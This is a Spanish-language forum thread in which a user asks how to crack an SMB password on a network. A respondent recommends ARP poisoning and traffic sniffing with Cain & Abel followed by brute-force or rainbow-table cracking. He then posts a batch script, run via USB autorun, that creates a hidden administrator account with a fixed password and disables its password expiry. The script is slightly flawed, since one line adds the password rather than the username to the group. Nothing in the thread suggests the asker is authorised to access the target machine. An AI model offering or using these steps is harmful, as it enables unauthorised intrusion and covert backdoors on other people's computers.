Ayuda con el protocolo smb

Iniciado por tordek, 24 Septiembre 2010, 04:21 AM

0 Miembros y 1 Visitante están viendo este tema.

tordek

buenas solo keria saber si hay alguna forma de crackear esta contraseña, he investigado y dicen que se puede con cain y abel, algun programa de fuerza bruta,etc.
porfa denme su opinion cual seria la forma mas eficaz de obtener esta contraseña?
de antemano gracias por sus respuestas

APOKLIPTICO

Lo que podés hacer es con cain & abel hacer arp poisoning y sniffar el tráfico buscando a alguien que se esté conectando al smb, una vez que se haya conectado, lo podés intentar crackear usando fuerza bruta, diccionarios o rainbow tables.
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.

tordek

no se puede algun exploit o algo por el estilo  :P sino voy a tener que quedarme con cain y abel  :D
gracias

APOKLIPTICO

Y... Podés tratar con nessus, hacé un escaneo y fijate si encontrás algo... Supongo que debes de tener acceso físico a esta computadora ya que estas en una lan (a menos obviamente q estés en una vpn, en cuyo caso no va a funcionar el método con cain y abel), si tenés acceso físico a esta pc, podés dejarla vulnerable con muchas cosas, desde un troyano, hasta un script que agregue un usuario con un nombre de usuario y una contraseña.
No lo probé, pero debería funcionar:
Este script agrega un usuario llamado "sys" con la contraseña "elhacker", lo agrega al grupo de administradores y luego edita una clave en el registro para ocultarlo de la pantalla de bienvenida, luego, evita que expire la contraseña.

Código (dos) [Seleccionar]

ECHO OFF
CLS
net user sys elhacker /add
net localgroup administradores elhacker /add
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v sys /t REG_DWORD /d 0
wmic path win32_useraccount where name='sys' set passwordexpires=false


Eso lo metés en un pendrive, luego modificas el autorun.inf para que se ejecute automáticamente y listo...
Lo único q tenes que hacer, es cuando esté prendida esta pc, enchufas el pendrive y listo.
AMD Phenom II 1075T X6 @ 290 Mhz x 11 (HT 2036 Mhz NB Link 2616 Mhz) 1.23 Vcore
ASUS M4A89GTD-PRO/USB3
2x2gb G-Skill RipjawsX DDR3 1600 Mhz CL7 (7-8-7-24-25-1T)
Seagate 500 Gb
XFX HD4850 512Mb GDDR3. 650 Mhz/995 Mhz 1.1 Tflops.